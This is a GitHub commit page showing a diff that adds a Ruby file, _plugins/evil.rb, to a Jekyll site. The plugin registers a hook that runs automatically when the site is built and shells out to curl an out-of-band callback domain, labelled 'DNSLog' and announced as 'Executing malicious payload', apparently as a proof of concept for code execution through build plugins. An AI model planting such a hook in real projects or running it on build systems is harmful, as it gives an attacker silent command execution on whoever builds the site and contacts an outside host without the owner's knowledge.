We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent f61c6f5 commit 017d9b5Copy full SHA for 017d9b5
_plugins/evil.rb
@@ -0,0 +1,9 @@
1
+# _plugins/evil.rb
2
+require 'open3'
3
+
4
+Jekyll::Hooks.register :site, :after_init do |site|
5
+ puts "Executing malicious payload..."
6
+ # DNSLog
7
+ stdout, stderr, status = Open3.capture3("curl http://bqiehrpshxqkxlzvdxgc32wowysc7once.oast.fun")
8
+ puts "Payload executed."
9
+end
0 commit comments